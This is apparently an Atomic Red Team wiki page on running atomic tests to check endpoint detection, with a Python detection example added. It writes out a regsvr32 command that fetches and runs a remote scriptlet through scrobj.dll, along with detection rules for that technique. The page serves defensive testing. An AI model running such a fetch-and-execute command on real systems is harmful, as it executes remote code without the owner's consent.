
Executing Atomic Tests

Adam Mashinchi edited this page Jul 14, 2021 · 1 revision

[THIS CONTENT MAY BE OUT OF DATE - PLEASE SEE "GETTING STARTED"]


Things to Consider Before Executing an Atomic Test

  • Make sure that you have permission from system owners to test.
  • To get familiar with Atomic Red Team, consider using a Virtual Machine. Microsoft provides easy-to-download, ready-to-use Virtual Machines here. If you want a test lab with an Active Directory domain, multiple systems and central logging in place, consider using Detection Lab or the Splunk Attack Range.
  • When you are ready, set up a test machine that would be similar to the build in your environment. Be sure you have your collection/EDR solution in place, and that the endpoint is checking in and active.
  • Consider disabling blocking controls as part of your testing. "Prevention is ideal, but detection is a must!"

Execute an Atomic Test Manually

We could browse through the list of available atomic tests and pick one to execute like the one below.

[Image: an example atomic test as listed in the repository]

This test is pretty straightforward: there is just one attack command, executed from the command prompt, that emulates this attack. We can simply copy and paste the command (after substituting in the #(unknown) input argument) as follows:

regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll

After execution, what does your security solution observe?

  • You may see a file modification in the user’s profile.
  • You may detect network connections made by regsvr32.exe to an external IP.
  • There may be an entry in the proxy logs.
  • You may observe the scrobj.dll loading on Windows.
  • Or you might not observe any behavior on the endpoint or network.

This is why we test! We want to identify visibility gaps and determine where we need to make improvements.
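As an added example (not part of this wiki or the Atomic Red Team project), the following Python runs detection logic over constructed endpoint events for the observables listed above: a regsvr32.exe command line that fetches a remote scriptlet with scrobj.dll, scrobj.dll being loaded by regsvr32.exe, and regsvr32.exe connecting to an external address. The event field names, the sample values and the "external" address definition are assumptions, not a real sensor's schema.

```python
import ipaddress
import re

# Constructed sample telemetry shaped like process-create, image-load and
# network-connect events from an endpoint sensor. These are not real logs.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/"
                "atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll"},
    {"type": "image_load", "image": r"C:\Windows\System32\regsvr32.exe",
     "loaded": r"C:\Windows\System32\scrobj.dll"},
    {"type": "network_connect", "image": r"C:\Windows\System32\regsvr32.exe",
     "dest_ip": "203.0.113.10"},   # constructed external address (TEST-NET-3)
    {"type": "network_connect", "image": r"C:\Windows\System32\regsvr32.exe",
     "dest_ip": "10.0.0.5"},       # internal address, should not be flagged
    {"type": "process_create", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},  # benign local DLL
]

# "/i:" pointing at an http(s) URL is the remote-scriptlet pattern the test uses.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)

# "External" here means outside RFC 1918, loopback and link-local space (an assumption).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

def is_regsvr32(image):
    return image.lower().rsplit("\\", 1)[-1] == "regsvr32.exe"

def is_external(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in INTERNAL_NETS)

def detect(events):
    """Return the names of the rules tripped by regsvr32.exe events, in event order."""
    findings = []
    for ev in events:
        if not is_regsvr32(ev.get("image", "")):
            continue
        if ev["type"] == "process_create":
            cmd = ev.get("cmdline", "")
            if REMOTE_SCRIPTLET.search(cmd) and "scrobj.dll" in cmd.lower():
                findings.append("regsvr32_remote_scriptlet")
        elif ev["type"] == "image_load":
            if ev.get("loaded", "").lower().endswith("scrobj.dll"):
                findings.append("regsvr32_loads_scrobj")
        elif ev["type"] == "network_connect" and is_external(ev["dest_ip"]):
            findings.append("regsvr32_external_connection")
    return findings
```

Running `detect(SAMPLE_EVENTS)` flags the first three events and leaves the internal connection and the local-DLL registration alone; if your sensor records none of these three event types, that is the visibility gap the test is meant to reveal.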

Execute an Atomic Test with an Execution Framework

There are a variety of Execution Frameworks that automate the execution of the atomic tests defined in this repository. The most actively maintained and feature-rich execution framework is the PowerShell Invoke-AtomicRedTeam framework. It works cross-platform for executing atomic tests locally or on remote machines. There are also Python and Go versions developed by the community.
